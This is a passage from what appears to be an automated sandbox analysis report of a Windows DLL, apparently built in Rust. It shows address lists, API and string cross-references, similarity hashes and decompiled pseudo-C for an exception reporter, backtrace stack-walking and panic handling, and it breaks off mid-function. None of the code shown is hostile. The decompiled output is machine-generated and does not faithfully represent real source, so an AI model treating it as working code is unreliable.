0x6ed17abb
0x00000000
0x6ed17ac1
0x6ed17ac1
0x6ed17ac5
0x00000000
0x6ed17acb
0x6ed17ace
0x6ed17ad2
0x6ed17ad7
0x6ed17ada
0x6ed17adf
0x6ed17ae2
0x6ed17ae8
0x6ed17aed
0x6ed17af3
0x6ed17afc
0x6ed17b01
0x6ed17b07
0x6ed17b11
0x6ed17b15
0x6ed17b1a
0x6ed17b1a
0x6ed17ac5
0x6ed17abb
0x6ed17aaa
0x6ed17a8e
0x6ed17a84
0x00000000
0x6ed17a4e
0x6ed17a4e
0x6ed17a51
0x6ed17a53
0x6ed17c33
0x6ed17c33
0x6ed17c33
0x6ed17c35
0x6ed17a59
0x6ed17a5e
0x6ed17a60
0x6ed17a65
0x6ed17a53
0x6ed17c3c
0x6ed17c3c
0x6ed1786c
0x6ed17863
0x6ed176df
0x6ed176aa
0x6ed176aa
0x6ed176ae
0x00000000
0x00000000
0x00000000
0x00000000
0x6ed176ae
0x6ed176a8
0x6ed176a0
0x6ed1768f
0x6ed1768a
0x00000000
0x6ed17680
0x6ed17660
0x00000000
0x6ed17643
0x6ed175f7
0x6ed175f7
0x6ed175fc
0x6ed177ab
0x6ed177ab
0x6ed177ab
0x6ed17602
0x6ed17607
0x6ed17611
0x6ed17611
0x6ed177ad
0x6ed177b6
0x6ed177b6
0x00000000

APIs

__aullrem.LIBCMT ref: 6ED17723
__aulldiv.LIBCMT ref: 6ED17733

Strings

{recursion limit reached}{invalid syntax}, xrefs: 6ED17C06
called `Option::unwrap()` on a `None` value, xrefs: 6ED179BC
bool, xrefs: 6ED1788B
?'for<, > as ::{shimclosure#[]dyn + ; mut const unsafe extern ", xrefs: 6ED17602, 6ED17A59

Memory Dump Source

Source File: 00000003.00000002.642548068.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000003.00000002.642533398.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.642617532.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.642681588.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.642689132.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.642695305.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID: __aulldiv__aullrem
String ID: ?'for<, > as ::{shimclosure#[]dyn + ; mut const unsafe extern "$bool$called `Option::unwrap()` on a `None` value${recursion limit reached}{invalid syntax}
API String ID: 3839614884-433696047
Opcode ID: b72f062f1b6964d78008acaf7ee82f751419d99a9f96124658a6acc6eb430273
Instruction ID: 21239cb732654127c575324156eb8a4289e2e6d1ffe22e7e818f79eda01ef3cc
Opcode Fuzzy Hash: b72f062f1b6964d78008acaf7ee82f751419d99a9f96124658a6acc6eb430273
Instruction Fuzzy Hash: 12E1F771A0C741AFE704CFA8D49079AB7F1AF86314F14896DD8958B3E1D734D846CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6ED2D1CC, Relevance: 6.1, APIs: 4, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E6ED2D1CC(intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
				char _v0;
				struct _EXCEPTION_POINTERS _v12;
				intOrPtr _v80;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v608;
				intOrPtr _v612;
				void* _v616;
				intOrPtr _v620;
				char _v624;
				intOrPtr _v628;
				intOrPtr _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				intOrPtr _v668;
				char _v808;
				char* _t39;
				long _t49;
				intOrPtr _t51;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr* _t60;

				_t59 = __esi;
				_t58 = __edi;
				_t57 = __edx;
				if(IsProcessorFeaturePresent(0x17) != 0) {
					_t55 = _a4;
					asm("int 0x29");
				}
				E6ED2D2E7(_t34);
				 *_t60 = 0x2cc;
				_v632 = E6ED2E9D0(_t58,  &_v808, 0, 3);
				_v636 = _t55;
				_v640 = _t57;
				_v644 = _t51;
				_v648 = _t59;
				_v652 = _t58;
				_v608 = ss;
				_v620 = cs;
				_v656 = ds;
				_v660 = es;
				_v664 = fs;
				_v668 = gs;
				asm("pushfd");
				_pop( *_t15);
				_v624 = _v0;
				_t39 =  &_v0;
				_v612 = _t39;
				_v808 = 0x10001;
				_v628 =  *((intOrPtr*)(_t39 - 4));
				E6ED2E9D0(_t58,  &_v92, 0, 0x50);
				_v92 = 0x40000015;
				_v88 = 1;
				_v80 = _v0;
				_t28 = IsDebuggerPresent() - 1; // -1
				_v12.ExceptionRecord =  &_v92;
				asm("sbb bl, bl");
				_v12.ContextRecord =  &_v808;
				_t54 =  ~_t28 + 1;
				SetUnhandledExceptionFilter(0);
				_t49 = UnhandledExceptionFilter( &_v12);
				if(_t49 == 0 && _t54 == 0) {
					_push(3);
					return E6ED2D2E7(_t49);
				}
				return _t49;
			}

0x6ed2d1cc
0x6ed2d1cc
0x6ed2d1cc
0x6ed2d1e0
0x6ed2d1e2
0x6ed2d1e5
0x6ed2d1e5
0x6ed2d1e9
0x6ed2d1ee
0x6ed2d206
0x6ed2d20c
0x6ed2d212
0x6ed2d218
0x6ed2d21e
0x6ed2d224
0x6ed2d22a
0x6ed2d231
0x6ed2d238
0x6ed2d23f
0x6ed2d246
0x6ed2d24d
0x6ed2d254
0x6ed2d255
0x6ed2d25e
0x6ed2d264
0x6ed2d267
0x6ed2d26d
0x6ed2d27c
0x6ed2d288
0x6ed2d293
0x6ed2d29a
0x6ed2d2a1
0x6ed2d2ac
0x6ed2d2b4
0x6ed2d2bd
0x6ed2d2bf
0x6ed2d2c2
0x6ed2d2c4
0x6ed2d2ce
0x6ed2d2d6
0x6ed2d2dc
0x00000000
0x6ed2d2e3
0x6ed2d2e6

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 6ED2D1D8
IsDebuggerPresent.KERNEL32 ref: 6ED2D2A4
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6ED2D2C4
UnhandledExceptionFilter.KERNEL32(?), ref: 6ED2D2CE

Memory Dump Source

Source File: 00000003.00000002.642548068.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000003.00000002.642533398.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.642617532.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.642681588.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.642689132.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.642695305.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 0b69a82b781cba256c60453b97b2ce0ad7675d3dc51b940b6ddfa61a3431c8ed
Instruction ID: 7de46bdd4ab7034d6f0f587d27cf5dfbe450fb7405f3a27a73734e12919d5d98
Opcode Fuzzy Hash: 0b69a82b781cba256c60453b97b2ce0ad7675d3dc51b940b6ddfa61a3431c8ed
Instruction Fuzzy Hash: BF311A75D05218DFEF51DFA4C989BCCBBB8AF08308F1040AAE50DAB240EB719A85CF54

Uniqueness

Uniqueness Score: -1.00%

Function 6ED1DD30, Relevance: 42.5, APIs: 19, Strings: 5, Instructions: 451
memorylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E6ED1DD30(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, long _a8) {
				void* _v16;
				char _v1456;
				void* __ebp;
				void _t191;
				void* _t194;
				long _t195;
				signed int _t200;
				void* _t201;
				void* _t204;
				void* _t205;
				long _t206;
				char _t208;
				void* _t217;
				void* _t218;
				void* _t221;
				void* _t227;
				void* _t229;
				void* _t233;
				void* _t235;
				void* _t241;
				void* _t243;
				void* _t244;
				void* _t246;
				void* _t250;
				void* _t252;
				long _t260;
				long _t262;
				void* _t263;
				void* _t264;
				char _t265;
				void* _t267;
				void* _t274;
				void* _t284;
				void* _t288;
				long _t291;
				WCHAR* _t293;
				void* _t294;
				WCHAR* _t304;
				long _t305;
				void* _t307;
				void* _t308;
				intOrPtr _t310;
				intOrPtr _t313;
				signed int _t315;
				intOrPtr _t317;
				void* _t318;
				void* _t322;
				void* _t324;

				_push(__ebx);
				_push(__edi);
				_push(__esi);
				_t317 = (_t315 & 0xfffffff0) - 0x5b0;
				_t310 = _t317;
				 *((intOrPtr*)(_t310 + 0x598)) = _t313;
				 *((intOrPtr*)(_t310 + 0x59c)) = _t317;
				 *(_t310 + 0x5a8) = 0xffffffff;
				 *((intOrPtr*)(_t310 + 0x5a4)) = E6ED239E0;
				 *((intOrPtr*)(_t310 + 0x5a0)) =  *[fs:0x0];
				 *[fs:0x0] = _t310 + 0x5a0;
				_t191 =  *_a4;
				 *(_t310 + 0x28) = _t191;
				 *(_t310 + 0xe) = _t191;
				E6ED2E9D0(__edi, _t310 + 0x190, 0, 0x400);
				_t318 = _t317 + 0xc;
				_t194 =  *0x6ed5f8cc; // 0x2
				_t262 = 0x200;
				 *(_t310 + 0x24) = 0;
				 *(_t310 + 0x2c) = _t194;
				 *(_t310 + 0x30) = 0;
				 *(_t310 + 0x14) = _t194;
				 *(_t310 + 0x34) = 0;
				 *(_t310 + 0x10) = 0x200;
				if(0x200 >= 0x201) {
					L4:
					_t291 =  *(_t310 + 0x24);
					_t263 = _t262 - _t291;
					__eflags =  *(_t310 + 0x30) - _t291 - _t263;
					if( *(_t310 + 0x30) - _t291 < _t263) {
						 *(_t310 + 0x5a8) = 0;
						_t274 = _t310 + 0x2c;
						E6ED39A30(_t274, _t291, _t263);
						_t318 = _t318 + 4;
						 *(_t310 + 0x14) =  *(_t310 + 0x2c);
					}
					_t262 =  *(_t310 + 0x10);
					_t304 =  *(_t310 + 0x14);
					 *(_t310 + 0x34) = _t262;
					 *(_t310 + 0x24) = _t262;
					 *(_t310 + 0x20) = _t304;
					 *(_t310 + 0x1c) = _t262;
				} else {
					L7:
					_t304 = _t310 + 0x190;
					 *(_t310 + 0x1c) = 0x200;
					 *(_t310 + 0x20) = _t304;
				}
				L8:
				SetLastError(0);
				_t195 = GetCurrentDirectoryW(_t262, _t304);
				_t305 = _t195;
				if(_t195 != 0 || GetLastError() == 0) {
					if(_t305 != _t262 || GetLastError() != 0x7a) {
						__eflags = _t305 -  *(_t310 + 0x10);
						_t262 = _t305;
						if(_t305 <  *(_t310 + 0x10)) {
							_t292 =  *(_t310 + 0x1c);
							 *(_t310 + 0x5a8) = 0;
							__eflags = _t305 -  *(_t310 + 0x1c);
							if(__eflags > 0) {
								E6ED39470(_t262, _t305, _t292, _t305, _t310, __eflags, 0x6ed606e0);
								goto L70;
							} else {
								_t293 =  *(_t310 + 0x20);
								_t274 = _t310 + 0x70;
								_push(_t305);
								E6ED20D10(_t262, _t274, _t293, _t305, _t310);
								_t318 = _t318 + 4;
								asm("movsd xmm0, [esi+0x70]");
								_t264 = 0;
								 *(_t310 + 0x48) =  *(_t310 + 0x78);
								asm("movsd [esi+0x40], xmm0");
								_t200 =  *(_t310 + 0x30);
								__eflags = _t200;
								if(_t200 != 0) {
									goto L18;
								} else {
								}
								goto L21;
							}
						} else {
							__eflags = _t262 - 0x201;
							 *(_t310 + 0x10) = _t262;
							if(_t262 < 0x201) {
								goto L7;
							} else {
								goto L4;
							}
							goto L8;
						}
					} else {
						_t262 =  *(_t310 + 0x10) +  *(_t310 + 0x10);
						 *(_t310 + 0x10) = _t262;
						if(_t262 >= 0x201) {
							goto L4;
						} else {
							goto L7;
						}
						goto L8;
					}
				} else {
					_t260 = GetLastError();
					_t264 = 1;
					 *(_t310 + 0x44) = _t260;
					 *(_t310 + 0x40) = 0;
					_t200 =  *(_t310 + 0x30);
					__eflags = _t200;
					if(_t200 != 0) {
						L18:
						__eflags =  *(_t310 + 0x14);
						if( *(_t310 + 0x14) != 0) {
							__eflags = _t200 & 0x7fffffff;
							if((_t200 & 0x7fffffff) != 0) {
								HeapFree( *0x6ed6e128, 0,  *(_t310 + 0x14));
							}
						}
					}
					L21:
					__eflags = _t264;
					if(_t264 == 0) {
						_t201 =  *(_t310 + 0x40);
						_t274 =  *(_t310 + 0x44);
						_t293 =  *(_t310 + 0x48);
						_t265 =  *(_t310 + 0x28);
						 *(_t310 + 0x5a8) = 2;
					} else {
						__eflags =  *(_t310 + 0x40) - 3;
						if( *(_t310 + 0x40) == 3) {
							_t288 =  *(_t310 + 0x44);
							 *(_t310 + 0x10) = _t288;
							 *(_t310 + 0x5a8) = 1;
							 *((intOrPtr*)( *((intOrPtr*)(_t288 + 4))))( *_t288);
							_t318 = _t318 + 4;
							_t250 =  *(_t310 + 0x10);
							_t274 =  *(_t250 + 4);
							__eflags =  *(_t274 + 4);
							if( *(_t274 + 4) != 0) {
								_t252 =  *_t250;
								__eflags =  *((intOrPtr*)(_t274 + 8)) - 9;
								if( *((intOrPtr*)(_t274 + 8)) >= 9) {
									_t252 =  *(_t252 - 4);
								}
								HeapFree( *0x6ed6e128, 0, _t252);
								_t250 =  *(_t310 + 0x44);
							}
							HeapFree( *0x6ed6e128, 0, _t250);
						}
						_t265 =  *(_t310 + 0xe);
						_t201 = 0;
						 *(_t310 + 0x5a8) = 2;
					}
					 *((char*)(_t310 + 0x68)) = _t265;
					 *(_t310 + 0x5c) = _t201;
					 *(_t310 + 0x64) = _t293;
					 *(_t310 + 0x60) = _t274;
					 *(_t310 + 0x190) = 0x6ed5fdd8;
					 *(_t310 + 0x194) = 1;
					 *(_t310 + 0x198) = 0;
					 *((intOrPtr*)(_t310 + 0x1a0)) = 0x6ed5f570;
					 *(_t310 + 0x1a4) = 0;
					_t294 =  *(_a8 + 0x1c);
					_push(_t310 + 0x190);
					_t204 = E6ED12150( *((intOrPtr*)(_a8 + 0x18)), _t294);
					_t322 = _t318 + 4;
					__eflags = _t204;
					if(_t204 != 0) {
						L50:
						_t205 =  *(_t310 + 0x5c);
						__eflags = _t205;
						if(_t205 != 0) {
							__eflags =  *(_t310 + 0x60);
							if( *(_t310 + 0x60) != 0) {
								HeapFree( *0x6ed6e128, 0, _t205);
							}
						}
						_t206 = 1;
						goto L54;
					} else {
						_t208 =  *(_t310 + 0xe);
						 *(_t310 + 0x6c) = 0;
						 *((char*)(_t310 + 0xf)) = 0;
						 *(_t310 + 0x40) = _a8;
						 *(_t310 + 0x44) = 0;
						__eflags = _t208;
						 *((char*)(_t310 + 0x50)) = _t208;
						 *(_t310 + 0x2c) = _t310 + 0xe;
						 *(_t310 + 0x48) = _t310 + 0x5c;
						 *((intOrPtr*)(_t310 + 0x4c)) = 0x6ed5fde0;
						 *(_t310 + 0x1b) = _t208 != 0;
						 *(_t310 + 0x30) = _t310 + 0x6c;
						 *(_t310 + 0x34) = _t310 + 0x1b;
						 *((intOrPtr*)(_t310 + 0x38)) = _t310 + 0xf;
						 *((intOrPtr*)(_t310 + 0x3c)) = _t310 + 0x40;
						 *(_t310 + 0x10) = GetCurrentProcess();
						 *(_t310 + 0x24) = GetCurrentThread();
						_t307 = _t310 + 0x190;
						E6ED2E9D0(_t307, _t307, 0, 0x2d0);
						_t324 = _t322 + 0xc;
						_push(_t307);
						L6ED2C5AE();
						_t217 = E6ED1E4E0(_t265, _t307, _t310);
						__eflags = _t217;
						if(_t217 == 0) {
							_t308 =  *0x6ed6e148; // 0x0
							 *(_t310 + 0x58) = _t294;
							__eflags = _t308;
							if(_t308 == 0) {
								_t218 = GetProcAddress( *0x6ed6e130, "SymFunctionTableAccess64");
								__eflags = _t218;
								if(__eflags == 0) {
									 *(_t310 + 0x5a8) = 3;
									E6ED394E0(_t265, "called `Option::unwrap()` on a `None` value", 0x2b, _t308, _t310, __eflags, 0x6ed60ad0);
									goto L70;
								} else {
									_t308 = _t218;
									 *0x6ed6e148 = _t218;
									_t267 =  *0x6ed6e14c; // 0x0
									__eflags = _t267;
									if(_t267 != 0) {
										goto L41;
									} else {
										goto L39;
									}
								}
							} else {
								_t267 =  *0x6ed6e14c; // 0x0
								__eflags = _t267;
								if(_t267 != 0) {
									L41:
									 *(_t310 + 0x20) = GetCurrentProcess();
									_t221 =  *0x6ed6e158; // 0x0
									 *(_t310 + 0x1c) = _t308;
									 *(_t310 + 0x14) = _t267;
									__eflags = _t221;
									if(_t221 != 0) {
										L44:
										 *(_t310 + 0x28) = _t221;
										 *(_t310 + 0x74) = 0;
										 *(_t310 + 0x70) = 0;
										E6ED2E9D0(_t308, _t310 + 0x80, 0, 0x10c);
										_t324 = _t324 + 0xc;
										 *(_t310 + 0x7c) = 0;
										 *(_t310 + 0x78) =  *(_t310 + 0x248);
										 *(_t310 + 0x84) = 3;
										 *((intOrPtr*)(_t310 + 0xa8)) =  *((intOrPtr*)(_t310 + 0x254));
										 *(_t310 + 0xac) = 0;
										 *(_t310 + 0xb4) = 3;
										 *((intOrPtr*)(_t310 + 0x98)) =  *((intOrPtr*)(_t310 + 0x244));
										 *(_t310 + 0x9c) = 0;
										 *(_t310 + 0xa4) = 3;
										while(1) {
											_t227 =  *(_t310 + 0x28)(0x14c,  *(_t310 + 0x10),  *(_t310 + 0x24), _t310 + 0x78, _t310 + 0x190, 0, _t308, _t267, 0, 0);
											__eflags = _t227 - 1;
											if(_t227 != 1) {
												goto L47;
											}
											 *(_t310 + 0x188) =  *_t267( *(_t310 + 0x20),  *(_t310 + 0x78), 0);
											 *(_t310 + 0x5a8) = 3;
											_t235 = E6ED1E6E0(_t267, _t310 + 0x2c, _t310 + 0x70, _t308, _t310);
											_t308 =  *(_t310 + 0x1c);
											_t267 =  *(_t310 + 0x14);
											__eflags = _t235;
											if(_t235 != 0) {
												continue;
											}
											goto L47;
										}
										goto L47;
									} else {
										_t221 = GetProcAddress( *0x6ed6e130, "StackWalkEx");
										__eflags = _t221;
										if(_t221 == 0) {
											E6ED2E9D0(_t308, _t310 + 0x80, 0, 0x100);
											_t324 = _t324 + 0xc;
											 *(_t310 + 0x74) = 0;
											 *(_t310 + 0x70) = 1;
											 *(_t310 + 0x188) = 0;
											 *(_t310 + 0x7c) = 0;
											 *(_t310 + 0x78) =  *(_t310 + 0x248);
											 *(_t310 + 0x84) = 3;
											 *((intOrPtr*)(_t310 + 0xa8)) =  *((intOrPtr*)(_t310 + 0x254));
											 *(_t310 + 0xac) = 0;
											 *(_t310 + 0xb4) = 3;
											 *((intOrPtr*)(_t310 + 0x98)) =  *((intOrPtr*)(_t310 + 0x244));
											 *(_t310 + 0x9c) = 0;
											 *(_t310 + 0xa4) = 3;
											do {
												_t284 =  *0x6ed6e144; // 0x0
												__eflags = _t284;
												if(_t284 != 0) {
													L63:
													_t241 =  *_t284(0x14c,  *(_t310 + 0x10),  *(_t310 + 0x24), _t310 + 0x78, _t310 + 0x190, 0, _t308, _t267, 0);
													__eflags = _t241 - 1;
													if(_t241 != 1) {
														L47:
														ReleaseMutex( *(_t310 + 0x58));
														__eflags =  *((char*)(_t310 + 0xf));
														if( *((char*)(_t310 + 0xf)) != 0) {
															goto L50;
														} else {
															goto L48;
														}
														goto L54;
													} else {
														goto L64;
													}
												} else {
													_t244 = GetProcAddress( *0x6ed6e130, "StackWalk64");
													__eflags = _t244;
													if(__eflags == 0) {
														 *(_t310 + 0x5a8) = 3;
														E6ED394E0(_t267, "called `Option::unwrap()` on a `None` value", 0x2b, _t308, _t310, __eflags, 0x6ed60ad0);
														goto L70;
													} else {
														_t284 = _t244;
														 *0x6ed6e144 = _t244;
														goto L63;
													}
												}
												goto L71;
												L64:
												 *(_t310 + 0x188) =  *_t267( *(_t310 + 0x20),  *(_t310 + 0x78), 0);
												 *(_t310 + 0x5a8) = 3;
												_t243 = E6ED1E6E0(_t267, _t310 + 0x2c, _t310 + 0x70, _t308, _t310);
												_t308 =  *(_t310 + 0x1c);
												_t267 =  *(_t310 + 0x14);
												__eflags = _t243;
											} while (_t243 != 0);
											goto L47;
										} else {
											 *0x6ed6e158 = _t221;
											goto L44;
										}
									}
								} else {
									L39:
									_t246 = GetProcAddress( *0x6ed6e130, "SymGetModuleBase64");
									__eflags = _t246;
									if(__eflags == 0) {
										 *(_t310 + 0x5a8) = 3;
										E6ED394E0(_t267, "called `Option::unwrap()` on a `None` value", 0x2b, _t308, _t310, __eflags, 0x6ed60ad0);
										L70:
										asm("ud2");
										_push(_t313);
										return E6ED1E6D0( *((intOrPtr*)( &_v1456 + 0x58)));
									} else {
										_t267 = _t246;
										 *0x6ed6e14c = _t246;
										goto L41;
									}
								}
							}
						} else {
							__eflags =  *((char*)(_t310 + 0xf));
							if( *((char*)(_t310 + 0xf)) != 0) {
								goto L50;
							} else {
								L48:
								__eflags =  *(_t310 + 0xe);
								if( *(_t310 + 0xe) != 0) {
									L55:
									_t229 =  *(_t310 + 0x5c);
									__eflags = _t229;
									if(_t229 != 0) {
										__eflags =  *(_t310 + 0x60);
										if( *(_t310 + 0x60) != 0) {
											HeapFree( *0x6ed6e128, 0, _t229);
										}
									}
									_t206 = 0;
								} else {
									 *(_t310 + 0x190) = 0x6ed5fe4c;
									 *(_t310 + 0x194) = 1;
									 *(_t310 + 0x198) = 0;
									 *((intOrPtr*)(_t310 + 0x1a0)) = 0x6ed5f570;
									 *(_t310 + 0x1a4) = 0;
									 *(_t310 + 0x5a8) = 2;
									_push(_t310 + 0x190);
									_t233 = E6ED12150( *((intOrPtr*)(_a8 + 0x18)),  *(_a8 + 0x1c));
									__eflags = _t233;
									if(_t233 == 0) {
										goto L55;
									} else {
										goto L50;
									}
								}
							}
							L54:
							 *[fs:0x0] =  *((intOrPtr*)(_t310 + 0x5a0));
							return _t206;
						}
					}
				}
				L71:
			}

APIs

SetLastError.KERNEL32(00000000), ref: 6ED1DE42
GetCurrentDirectoryW.KERNEL32(?,?), ref: 6ED1DE4A
GetLastError.KERNEL32 ref: 6ED1DE56
GetLastError.KERNEL32 ref: 6ED1DE68
GetLastError.KERNEL32 ref: 6ED1DECC
HeapFree.KERNEL32(00000000,00000000), ref: 6ED1DEFD
HeapFree.KERNEL32(00000000,?), ref: 6ED1DF47
HeapFree.KERNEL32(00000000,?), ref: 6ED1DF58
GetCurrentProcess.KERNEL32(?), ref: 6ED1E031
GetCurrentThread.KERNEL32 ref: 6ED1E039
RtlCaptureContext.KERNEL32(?), ref: 6ED1E059
GetProcAddress.KERNEL32(SymFunctionTableAccess64,?), ref: 6ED1E09A
GetProcAddress.KERNEL32(SymGetModuleBase64), ref: 6ED1E0C4
GetCurrentProcess.KERNEL32 ref: 6ED1E0D9
GetProcAddress.KERNEL32(StackWalkEx), ref: 6ED1E0FB
ReleaseMutex.KERNEL32(?), ref: 6ED1E1E8
HeapFree.KERNEL32(00000000,?), ref: 6ED1E26B
HeapFree.KERNEL32(00000000,?,?), ref: 6ED1E29D
GetProcAddress.KERNEL32(StackWalk64), ref: 6ED1E345

Strings

called `Option::unwrap()` on a `None` value, xrefs: 6ED1E3CC, 6ED1E3EF, 6ED1E412
StackWalkEx, xrefs: 6ED1E0F0
SymGetModuleBase64, xrefs: 6ED1E0B9
SymFunctionTableAccess64, xrefs: 6ED1E08F
StackWalk64, xrefs: 6ED1E33A

Memory Dump Source

Source File: 00000003.00000002.642548068.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000003.00000002.642533398.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.642617532.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.642681588.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.642689132.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.642695305.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeap$AddressCurrentErrorLastProc$Process$CaptureContextDirectoryMutexReleaseThread
String ID: StackWalk64$StackWalkEx$SymFunctionTableAccess64$SymGetModuleBase64$called `Option::unwrap()` on a `None` value
API String ID: 1381040140-1036201984
Opcode ID: e0eeed8ee4ab3892ae86ceabb33d1e5c146884644e7806e037e1eb8d885e7b07
Instruction ID: 10e5435a145b763173f98cd6410c0dfee4366192d46b81099601e362fd13b71c
Opcode Fuzzy Hash: e0eeed8ee4ab3892ae86ceabb33d1e5c146884644e7806e037e1eb8d885e7b07
Instruction Fuzzy Hash: 661226B0604B009FE761CFA1D894B97BBF4BB4A308F00492DD99A8BB90D775F549CB52

Uniqueness

Uniqueness Score: -1.00%

Function 6ED1C700, Relevance: 32.0, APIs: 14, Strings: 4, Instructions: 477
memoryCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E6ED1C700(long _a4, signed int _a8) {
				void* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				void* _v36;
				void* _v40;
				char _v41;
				long _v48;
				long* _v52;
				intOrPtr _v56;
				long _v60;
				void _v64;
				long* _v68;
				long _v72;
				char _v76;
				long* _v80;
				void* _v84;
				char _v88;
				long _v92;
				char* _v96;
				long _v100;
				void* _v104;
				void** _v108;
				void* _v112;
				long _v116;
				void* _v120;
				long _v124;
				char _v128;
				intOrPtr _v132;
				void _v136;
				void* _v140;
				intOrPtr _v144;
				signed int _v148;
				intOrPtr _v152;
				intOrPtr* _t190;
				void* _t194;
				void _t195;
				intOrPtr* _t196;
				signed int _t197;
				signed int _t199;
				char* _t201;
				long _t202;
				long _t203;
				void* _t204;
				void* _t205;
				long _t206;
				void _t209;
				void _t210;
				void* _t219;
				void* _t222;
				long _t226;
				void* _t235;
				void* _t245;
				void* _t247;
				void* _t248;
				char** _t251;
				char** _t252;
				void* _t256;
				void* _t260;
				void _t264;
				char _t265;
				signed char _t267;
				void _t270;
				intOrPtr _t273;
				void* _t275;
				char* _t276;
				void _t277;
				void* _t280;
				intOrPtr _t291;
				intOrPtr _t295;
				void _t298;
				long _t302;
				void* _t307;
				void* _t308;
				void* _t309;
				signed int _t310;
				signed int _t312;
				void* _t318;
				intOrPtr* _t324;
				long _t326;
				void* _t327;
				void* _t330;
				void* _t331;
				void* _t332;
				void* _t333;
				void* _t334;
				void* _t335;
				intOrPtr _t336;
				void* _t347;
				void* _t360;
				long _t361;

				_v32 = _t336;
				_v20 = 0xffffffff;
				_v24 = E6ED239A0;
				_t264 = _t270;
				_t332 = 1;
				_t330 = _t307;
				_v28 =  *[fs:0x0];
				 *[fs:0x0] =  &_v28;
				asm("lock xadd [0x6ed6e120], esi");
				_t190 = E6ED1D000(_t264, _t330);
				_t337 = _t190;
				if(_t190 == 0) {
					_t190 = E6ED395A0(_t264,  &M6ED5F8F7, 0x46, _t337,  &_v68, 0x6ed5f870, 0x6ed5f9bc);
					_t336 = _t336 + 0xc;
					asm("ud2");
				}
				_t308 = _a8;
				_t273 =  *_t190 + 1;
				 *_t190 = _t273;
				if(_t332 < 0 || _t273 >= 3) {
					__eflags = _t273 - 2;
					if(__eflags <= 0) {
						_v124 = 0x6ed5f570;
						_v120 = 0x6ed5f824;
						_v68 = 0x6ed60260;
						_v64 = 2;
						_v96 = 0;
						_v100 = 0;
						_v60 = 0;
						_v116 = _a4;
						_v112 = _t308;
						_t309 =  &_v68;
						_v80 =  &_v124;
						_v76 = E6ED12470;
						_v52 =  &_v80;
						_v48 = 1;
						_t194 = E6ED1D0F0( &_v100, __eflags);
						__eflags = _t194 - 3;
						if(_t194 == 3) {
							_v20 = 0;
							_v36 = _t309;
							 *((intOrPtr*)( *((intOrPtr*)(_t309 + 4))))( *_t309);
							_t336 = _t336 + 4;
							L11:
							_t332 = _v36;
							_t302 =  *(_t332 + 4);
							__eflags =  *(4 + _t302);
							if( *(4 + _t302) != 0) {
								_t256 =  *_t332;
								__eflags =  *((intOrPtr*)(_t302 + 8)) - 9;
								if( *((intOrPtr*)(_t302 + 8)) >= 9) {
									_t256 =  *(_t256 - 4);
								}
								HeapFree( *0x6ed6e128, 0, _t256);
							}
							_t194 = HeapFree( *0x6ed6e128, 0, _t332);
						}
						goto L16;
					}
					_t327 =  &_v68;
					_v68 = 0x6ed60224;
					_v64 = 1;
					_v60 = 0;
					_v52 = 0x6ed5f570;
					_v120 = 0;
					_v124 = 0;
					_v48 = 0;
					_t194 = E6ED1D0F0( &_v124, __eflags);
					__eflags = _t194 - 3;
					if(_t194 != 3) {
						goto L16;
					} else {
						_v20 = 1;
						_v36 = _t327;
						 *((intOrPtr*)( *((intOrPtr*)(_t327 + 4))))( *_t327);
						_t336 = _t336 + 4;
						goto L11;
					}
				} else {
					_v132 = _t273;
					__imp__AcquireSRWLockShared(0x6ed6e11c);
					_v144 = 0x6ed6e11c;
					_v20 = 2;
					_v136 = _t264;
					_v140 = _t330;
					_t260 =  *((intOrPtr*)(_t330 + 0x10))(_t264);
					_t336 = _t336 + 4;
					_v36 = _t260;
					_v40 = _t308;
					_t194 = E6ED1D000(_t264, _t330);
					_t330 = _v40;
					_t340 = _t194;
					if(_t194 != 0) {
						L17:
						__eflags =  *_t194 - 1;
						_t275 = 1;
						if( *_t194 <= 1) {
							_t195 =  *0x6ed6e110; // 0x0
							_t310 = _a8;
							__eflags = _t195 - 2;
							if(_t195 == 2) {
								_t275 = 0;
								goto L19;
							}
							__eflags = _t195 - 1;
							if(_t195 == 1) {
								_t275 = 4;
								goto L19;
							}
							__eflags = _t195;
							if(_t195 != 0) {
								goto L19;
							}
							E6ED1D380(_t264,  &_v68, _t330, _t332);
							_t330 = _v40;
							_t248 = _v68;
							__eflags = _t248;
							if(_t248 != 0) {
								goto L68;
							}
							_t267 = 5;
							goto L86;
						}
						_t310 = _a8;
						goto L19;
